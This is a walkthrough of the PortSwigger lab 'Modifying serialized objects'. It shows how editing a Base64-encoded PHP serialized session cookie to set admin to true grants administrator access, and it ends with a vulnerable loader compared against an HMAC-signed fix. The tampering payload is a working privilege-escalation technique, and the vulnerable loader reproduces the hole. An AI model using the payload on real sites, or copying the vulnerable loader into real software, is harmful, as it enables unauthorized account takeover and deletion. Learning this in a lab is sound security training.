PortSwigger Lab: Modifying serialized objects | WalkThrough

WraithOP
3 min read · Dec 30, 2021

Introduction

Today in this post I am going to share my walkthrough for the PortSwigger lab "Modifying serialized objects". In this lab, after logging in we find that our session cookie is a PHP serialized object; we then modify the cookie so that we become admin, and finally delete the user carlos to solve the lab.

Objective

This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete Carlos’s account.

You can log in to your own account using the following credentials: wiener:peter

Detection

Log in with the credentials given to us, wiener:peter.

As we can see, a session cookie has been created.

After Base64-decoding the cookie, we can see a PHP serialized object. Let's write some PHP code to unserialize the value.

Exploitation

PHP code used to unserialize the cookie:

<?php
// Decoded session cookie, exactly as taken from the browser
$strng = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}';
$uns = unserialize($strng);
// Dumps the object, including its "admin" property
var_dump($uns);
?>

We can see there is an admin property which is set to false; we need to change it to true. To do that we need to know a little about PHP's serialization format: b:0 is boolean false and b:1 is boolean true. So change the b value from 0 to 1.

<?php
// Original cookie value: admin is b:0 (false)
$strng = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}';
$uns = unserialize($strng);
var_dump($uns);

// Modified payload: the same object with admin set to b:1 (true)
$finpay = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}';
var_dump(unserialize($finpay));
?>

In the output, the second var_dump (the modified payload) shows admin as true, whereas the first (the original cookie) shows it as false.

Base64-encode and then URL-encode this payload:

O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}

Paste the encoded value into the session cookie and refresh the page.

We can see an Admin panel, so we are admin now.

To complete the lab, delete Carlos's account.
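The reason this works is that the server trusts whatever comes back in the cookie: there is no integrity check, so any property of the serialized object can be rewritten by the client. Below is an added example (my own code, not part of the original post or of the PortSwigger lab) that puts a session loader written in that vulnerable style next to a hardened one that signs the session with an HMAC and refuses anything it did not issue. The User class, the function names, the cookie layout (payload.mac) and the demo key are assumptions; the two serialized strings are the ones from the walkthrough above.

```php
<?php
// Added example, not code from the original post or from PortSwigger.
// Class name, function names, cookie layout and SESSION_KEY are assumptions.

class User
{
    public $username;
    public $admin;
}

// Vulnerable pattern: the session is whatever the client hands back.
function loadSessionVulnerable(string $cookie): ?User
{
    $raw = base64_decode(urldecode($cookie), true);
    if ($raw === false) {
        return null;
    }
    // unserialize() of attacker-controlled bytes: the client decides the
    // value of every property, including "admin".
    $obj = unserialize($raw, ['allowed_classes' => [User::class]]);
    return $obj instanceof User ? $obj : null;
}

// Hardened pattern: sign what the server issues, verify before decoding,
// and carry plain data (JSON) rather than serialized objects.
// In a real deployment the key is a random secret from configuration.
const SESSION_KEY = 'constructed-demo-key-not-for-production';

function issueSession(string $username, bool $admin): string
{
    $payload = base64_encode(json_encode(['username' => $username, 'admin' => $admin]));
    $mac = hash_hmac('sha256', $payload, SESSION_KEY);
    return $payload . '.' . $mac;   // base64 never contains '.', so the split is unambiguous
}

function loadSessionHardened(string $cookie): ?array
{
    $parts = explode('.', urldecode($cookie), 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $mac] = $parts;
    $expected = hash_hmac('sha256', $payload, SESSION_KEY);
    if (!hash_equals($expected, $mac)) {
        return null;   // modified or forged cookie: reject before decoding anything
    }
    $data = json_decode(base64_decode($payload, true), true);
    if (!is_array($data) || !isset($data['username'], $data['admin'])) {
        return null;
    }
    return ['username' => (string) $data['username'], 'admin' => (bool) $data['admin']];
}

// Demo with the two cookie values from the walkthrough.
$original = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}';
$tampered = 'O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}';

foreach ([$original, $tampered] as $blob) {
    // Same encoding steps as in the lab: Base64, then URL-encode
    $cookie = urlencode(base64_encode($blob));
    $u = loadSessionVulnerable($cookie);
    printf("vulnerable loader: user=%s admin=%s\n", $u->username, var_export($u->admin, true));
}

// A cookie issued by the server verifies and decodes normally.
$cookie = issueSession('wiener', false);
var_dump(loadSessionHardened(urlencode($cookie)));

// Rewriting the payload without the key leaves the old MAC behind,
// so loadSessionHardened rejects it instead of granting admin.
[$payload, $mac] = explode('.', $cookie, 2);
$forged = base64_encode(json_encode(['username' => 'wiener', 'admin' => true])) . '.' . $mac;
var_dump(loadSessionHardened(urlencode($forged)));
```

Two design points are worth noting. The vulnerable loader is already slightly better than the lab's behaviour because it restricts `unserialize()` with `allowed_classes`, yet that does nothing for this bug: the data is still unauthenticated, so the admin flag can still be flipped. The fix is integrity, not input filtering: the server must verify `hash_hmac` with `hash_equals` (constant-time) before it decodes the payload, and ideally it should not let the client carry authorization state at all, keeping the admin flag server-side keyed by an opaque session ID.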
